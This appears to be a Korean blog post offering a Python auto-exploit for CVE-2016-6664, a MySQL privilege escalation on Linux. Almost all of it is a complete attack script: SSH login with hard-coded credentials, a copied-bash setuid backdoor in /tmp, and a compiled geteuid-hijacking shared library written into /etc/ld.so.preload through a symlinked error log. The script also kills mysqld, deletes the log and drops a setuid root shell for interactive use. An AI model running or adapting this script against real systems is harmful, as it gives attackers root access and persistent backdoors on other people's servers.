반응형
Cve-2016-6664 ][ python으로 포팅 및 자동 exploit
1.소스
''' write by SpeeDr00t ''' from jkc_header import * from cshell import * from CSshConnector import * class Cve20166664 : def __init__(self, _host, _id , _passwd ) : self.shell = '' self.ssh = '' self.log_path = '' self.backdoor_src = '/bin/bash' self.backdoor = '/tmp/mysqlrootsh' self.preload_file = '/etc/ld.so.preload' self.exploit_src = '/tmp/exploit.c' self.exploit = '/tmp/exploit.so' self.root_shell_src ='/tmp/speedroot.c' self.root_shell ='/tmp/speedroot' self.connect( _host , _id , _passwd ) def get_log_path(self) : return self.log_path def do_print(self , _name = '' , _data = '\n' ) : print " -- > %s : %s " % ( _name , _data ) def connect(self, _host , _id , _passwd ) : self.shell = CSshConnector(_host ,_id,_passwd) self.ssh = self.shell.get_ssh() def log_file_path(self) : self.log_path = self.shell.send_cmd('ps aux | grep mysql | awk -F\'log-error=\' \'{ print $2 }\' | cut -d\' \' -f1 | grep \'/\'') self.do_print("log_path",self.log_path) def check_id(self) : chk_id = self.shell.send_cmd('id | grep mysql') self.do_print('check id',chk_id) def do_check_file(self, _file) : result = self.shell.send_cmd('ls -ltr ' + _file ) self.do_print('check file ', result ) if( result == '' ) : return 0 else : return 1 def do_create_backdoor(self) : cmd = "cp %s %s " % ( self.backdoor_src , self.backdoor ) self.shell.send_cmd(cmd) self.do_print('create backdoor ',cmd) def do_upload_exploit(self) : self.ssh.upload_data(""" #define _GNU_SOURCE #include <stdio.h> #include <sys/stat.h> #include <unistd.h> #include <dlfcn.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> uid_t geteuid(void) { static uid_t (*old_geteuid)(); old_geteuid = dlsym(RTLD_NEXT, "geteuid"); if ( old_geteuid() == 0 ) { chown("/tmp/mysqlrootsh", 0, 0); chmod("/tmp/mysqlrootsh", 04777); //unlink("/etc/ld.so.preload"); } return old_geteuid(); } """,self.exploit_src) self.do_print('do upload exloit' ,'ok') self.ssh.gcc(['-Wall','-fPIC','-shared','-o',self.exploit,self.exploit_src,'-ldl']) self.do_print('compile' ,'ok') self.do_check_file(self.exploit ) def do_upload_root_shell(self) : self.ssh.upload_data(""" #include <stdio.h> int main( int argc , char ** argv ) { setuid(0); setgid(0); system("/bin/bash"); return 0; } """,self.root_shell_src) self.do_print('do upload root shell' ,'ok') self.ssh.gcc(['-o',self.root_shell,self.root_shell_src]) self.do_print('compile' ,'ok') self.do_check_file(self.root_shell_src ) def do_delete(self, _file ) : self.shell.send_cmd('rm ' + self.log_path ) self.do_print('rm ' ,self.log_path) self.do_check_file(self.log_path) def do_check_link_file(self): self.do_check_file( self.preload_file ) self.do_check_file( self.log_path ) def do_link(self) : cmd = "ln -s %s %s" % ( self.preload_file , self.log_path ) self.shell.send_cmd(cmd) self.do_print('link' , cmd ) self.do_check_link_file() def do_symlink(self) : self.do_check_link_file() # rm /usr/local/mysql/data/debian.err self.do_delete(self.log_path) self.do_link() def do_killall_mysqld(self) : self.do_print('killall mysqld' ) self.shell.send_cmd('killall mysqld') def do_echo(self) : #print self.ssh.echo([self.exploit,">",self.preload_file]) self.shell.send_cmd("echo " + self.exploit + " > " + self.preload_file) def do_cat(self, _file ) : cmd = "cat %s " % ( _file ) self.shell.send_cmd(cmd) self.do_print(cmd ) def do_check_backdoor(self) : self.do_check_file( self.preload_file ) self.do_check_file( self.preload_file + " | grep rws | grep -q root " ) def do_chmod(self, _file ) : cmd = "chmod 755 %s" % ( _file ) self.shell.send_cmd(cmd) self.do_print(cmd ) def do_sudo(self) : self.shell.send_cmd("sudo 2>/dev/null >/dev/null") def do_clear(self) : cmd = "%s -p -c rm -f %s;rm -f %s" % (self.backdoor , self.preload_file, self.exploit ) self.shell.send_cmd(cmd) self.do_print(cmd ) def do_run(self) : cmd = "%s -p -c \"rm -f /etc/ld.so.preload; rm -f %s\"" % ( self.backdoor, self.exploit ) print self.shell.send_cmd(cmd) self.do_print(cmd) cmd = " command > %s -p -c %s " % (self.backdoor, self.root_shell) #self.ssh['/tmp/mysqlrootsh -p -c /tmp/speedroot'] self.do_print(cmd) def do_check_file_loop(self, _path) : while(True) : sleep(0.1) if( self.do_check_file(_path + " | grep root " ) ) : print "do check file loop " # echo /tmp/exploit.so > /etc/ld.so.prelod self.do_echo() self.do_check_file( self.preload_file ) # rm /usr/local/mysql/data/debian.err self.do_delete(self.log_path) break; def do_exploit(self) : # get log file apth self.log_file_path() # check id ( mysql ) self.check_id() # create backdoor self.do_create_backdoor() # upload exploit self.do_upload_exploit() # upload root shell(root.sh) self.do_upload_root_shell() # symlink the log file to /etc self.do_symlink() # kill all mysqld self.do_killall_mysqld() # wait for /etc/ld.so.preload self.do_check_file_loop( self.preload_file ) # echo /tmp/exploit.so > /etc/ld.so.prelod self.do_echo() self.do_check_file( self.preload_file ) # chmod 755 /etc/ld.so.preload self.do_chmod(self.preload_file) # inject the exloit.so shared library to escalate privileges self.do_sudo() self.do_check_backdoor() self.do_check_file( self.preload_file ) self.do_cat( self.preload_file) self.do_run() self.ssh.interactive() poc = Cve20166664( '192.168.163.135', 'mysql','hacker') poc.do_exploit()
결과
반응형
'CVE > CVE-2016-6664' 카테고리의 다른 글
아 귀찮아 auto exploit 프로젝트 ][ CVE-2016-6664 mysql 취약점(root 권한 상승) (0) | 2019.03.19 |
---|